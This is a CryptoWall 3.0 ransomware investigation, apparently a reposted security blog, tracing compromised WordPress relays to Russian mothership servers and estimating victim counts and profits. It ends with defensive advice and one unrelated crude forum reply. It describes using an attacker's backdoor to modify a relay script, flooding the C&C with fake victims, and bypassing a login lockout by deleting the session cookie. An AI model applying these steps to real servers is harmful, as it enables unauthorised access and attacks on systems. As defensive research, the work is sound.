{176|ayh2m57ruxjtwyd5.onion|1egeY33|NL|—–BEGIN PUBLIC KEY—– MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyY6b3Ea6NYvFAz3BMBRr zS9TZrnAdg2FksXisD95iFBSbWjMXQlWf4YuU84cyDvmRBpicbaN6K3Rkk1EjW4G lAA3jEZi2IvapsJpKoXhMIVxOhqbni+LQMsdsnEB+3FGWNHW7YvBwUSDvJbD+0qG i1fNzbL/AZ8Wz5g7wbrUzGSsi+Yjj37nQuPRDz4AheKayMsz9ENvOLvqhA+Malpv eOLwDMncsRr4byu9QuWRCvyoas5z86IBq/l4LKGeJO1my6ICvRQZ4QExwDTQBWKy 0G7B8niBVYHDOHIe3Owp2C6y7WzolP97WCwsuYB2kmGHnhtas4uTRQ/6IYZcK47E gQIDAQAB —–END PUBLIC KEY—–} At this last stage, the C&C replied with the TOR link for the ransom, the personal ID and the public RSA key. The infected computer will then start encrypting files with that key.Knowing this, we were able to establish by ourselves the different value that would be sent to the C&C in our program. We only had to generate MD5 that hadn’t been already received by the ransomware server to make it believe that we were a new victim. One of the ideas was to exhaust the server with our requests. Using this program in a loop, we were able to generate many different unique ID’s and public keys. Since a unique ID is normally 7 characters long (case-sensitive, plus a mix of digits), 58^7 ID are possible in theory. Because we’re able to generate no more than 1000 requests per minute, it would have taken far too long to exhaust all ID possible.Investigation on the infected WordPress To advance further in the investigation, we chose to take a look at recent samples of CryptoWall 3.0 from Hybrid Analysis to find commonalities between the different infected WordPress. After looking at multiples infected pages, we didn’t notice a common vulnerabilities, except that the infected path always seems to be part of a WordPress plugin.However, two of the WordPress observed had a PHP backdoor installed, which is a PHP file that allows the attacker to have a web control panel: With this malicious code, they can access and control multiple things on the servers. Furthermore, this allowed us to download the code which serves to respond to infected computers. Getting our hands on this file allowed us to move forward to better understand the communication and the infection process. What we can see in this PHP code is that the ransomware: Decrypts the encrypted message with the RC4 key in the parameter Makes validation to ensure that the message is in the good format and strips the bracket Forwards the message content to the mothership at the hard coded IP address We tried it by installing a PHP server on a local computer and making a fake call to the CryptoWall PHP file. We then captured the traffic exchanged between the server and the mothership: Request: {7|crypt19|7A1A7EA984BD56663C7A5558576C3559|1} So it becomes clear that the infected WordPress only acts as a filter and a relay. It also helps to conceal the ransomware infrastructure.Since the file in question was used at the same time to respond to infected computers, we took the opportunity to add a few lines of code to record the requests made to it in a text file. We also neutralized the code by commenting the part which forwarded the request. The outputting file gave us information about the time at which the request was made, the originating IP address and the CryptoWall message (version, unique MD5 identifiers …) for each computer calling it.Each of these inputs represent a query made by an infected computer to this specific infected page. On the first website, we were able to collect data only for 29 hours before the account got suspended by the provider (2015-09-30 to 2015-10-02) and we got 40228 entries in the text file. The second one, lasted 88 hours before the bandwidth limit was exceeded and allowed us to get 130146 entries (capturing from 2015-10-23 to 2015-10-27).After removing redundant entries in both files by comparing the unique identifier of victims (MD5 hash), only 3546 entries were left from the first one and 15068 from the second one. The reason why so many inputs were duplicated is because a unique infected computer will sometimes make more than 2 requests before being able to receive an answer from the C&C.We then used Elastic Search and Kibana to visually represent the data: Requests made to the first WordPress site over 29 hours Requests made to the second WordPress site over 88 hoursWe then aggregated the data of both WordPress sites to pull out statistics about the victims. The MaxMind databases were used to find the country and the AS from the originating IP addresses of those entries: Top originating AS of victims Top country of victims World map representing victim’s location from our datasetMultiple sub-versions of CryptoWall were also observed: Different version used by CryptoWallBy regrouping both sets of data together and removing the duplicate entries based on the MD5 hash, we accumulated 18614 unique infected users. On the first set of data, 3546 unique ID’s were collected over a period of 29h, which makes approximately 122.27 unique victims per hour. On the second set of data, 15068 unique ID’s were collected, over a period of 88h, which makes approximately 171.22 unique victims per hour. Calculating the average of both, we obtain approximately 146 unique infected users per hour, which make 3504 per day and 105120 per month. Using numbers from USCert viaSymantec 2.9% of users pay the ransom approximately. With an average ransom of $500, this meant malicious actors profited $52560 per day, $1576800 per month and $18921600 per year just with this part of the infrastructure that was discovered. However, it is difficult to be 100% accurate with these numbers.Glimpse of the Mothership Since we now had the IP address of the mothership from the PHP files on the infected WordPress, we started investigating it. The first IP was 95.128.182.22 and the second 95.128.182.121. Both of the IP were registered by an ISP named TrustInfo, in Moscow, Russia. The IP addresses have at least 3 open ports in common: 22, 80 and 3389. By browsing through them, we can’t see much except a blank page on the main page. But after looking for other active pages on the servers, we found that the server status page was enabled: As you can see, the server is apparently hosting a TOR hidden website (xtpdvz6dnj5nnpe7.onion). This hidden website is also a known TOR address from the ransom of CryptoWall 3.0. It’s using NGINX proxy to forward requests. The POST requests that we’re seeing are all the different WordPress sites forwarding the requests to the MotherShip and the parameter on each of these requests are the only RC4 key for decrypting the communication. Accessing the ransom page directlyBy taking a look at the autonomous system information, we saw that the ISP TrustInfo has 3 subnets. We decided to investigate further in those subnets, searching for servers that had the same ports open with the same version of services. For instance, we looked for hosts that had port 22 with OpenSSH version 6.0 responding to the criteria and port 80 with NGINX 1.2.1. One subnet in particular, 95.128.180.0/22 had a lots of hosts responding to this criteria.After verifying each of them, by establishing if the page http://ip/server-status/ showed us the same TOR address and had the same uptime, we found 9 more servers than the two previously discovered: CryptoWall 3.0 architectureThus, motherships servers are playing at least two roles: forwarding the requests of infected victims and supporting the TOR website to pay the ransom. Since NGINX is installed on all of them, and they all refer to the same Apache server, they seem to serve only as a gateway, so that makes us believe that the secrete keys are stored elsewhere, well kept away from us.By comparing all the different requests made on the server status page, some GET requests got our attention. This lead us to a login page on this same server: At first look, it seems to be the management page for the owners of CryptoWall. This page seems to be custom made. They are doing basic authentication with a username and a password. The password is hashed in MD5 client-side before being passed by the POST request to the server. After 3 failed attempts, the system refuses any more try’s. It is however possible to reset the number of failed attempts by deleting the PHPSESSID cookie. However, we don’t know what this page provides access to.After monitoring the status page, we also did some statistics: Request type received by the server CPU load over time Total access requests to the server over time At its peak, the server behind the proxy has processed almost 44 GB of data in 30 daysProtection against ransomware In order to protect computers against all types of viruses, there should always be a minimum of an updated antivirus. However, in this research we saw many samples that weren’t detected by any antivirus on VirusTotal. In these cases, email attachment filters are really useful, because a lot of the infection is coming from this vector. Also, limiting the advertising when surfing the internet with a proxy (to avoid the malvertising, which can exploit other vulnerabilities) and using an IPS will help. Blocking servers that infected computers will contact is not very effective, because they change very often and the payload normally knows multiples websites to contact.Some other methods may be useful if you want to be alerted by a new infected computer making requests. You can make a rule in your firewall that alerts you when someone visits http://ip-addr.es, which is used every time by CryptoWall to gather the external IP address. Other ransomware also use this technique but with various websites. There is also a way to be alerted by your SAN by watching the I/O by users. In fact, computers infected by a ransomware will try to encrypt network drives aggressively, which can be detected by looking at the number of transactions in a certain time frame.You can also block the execution of a program in the temporary directory of windows. There is no reason why a program should start from there, and it is often used by malware. This procedure will show you how to create GPOs to do that.You should however be prepared no matter what and have backups for your systems. Conclusion Given that all motherships servers seem to have the same configuration, they are probably deployed automatically from a template by the attacker. Moreover, the fact that we see new infected WordPress with CryptoWall 3.0 almost each week demonstrates the organization of the attacker, because this also implies that they must update the ransomware each time so that the malware has the right URLs to contact.This whole process is well structured, it evolves to avoid being detected and seems to have become the new trend for hackers to make money. Other aspects of the ransomware would have been interesting to investigate, but because of the lack of time we didn’t go any further.Feel free to contact me for any questions, suggestions or comment at malware @ brillantit.com References: Intel TALOS Vallejo Sentinel One TrendMicro SecureWorks Sursa: http://blog.brillantit.com/?p=15

Daca era ziua lui Steve Jobs, sareati de cur in sus si il pupati pe pula. Omul asta a ajutat lumea. https://en.wikipedia.org/wiki/Bill_%26_Melinda_Gates_Foundation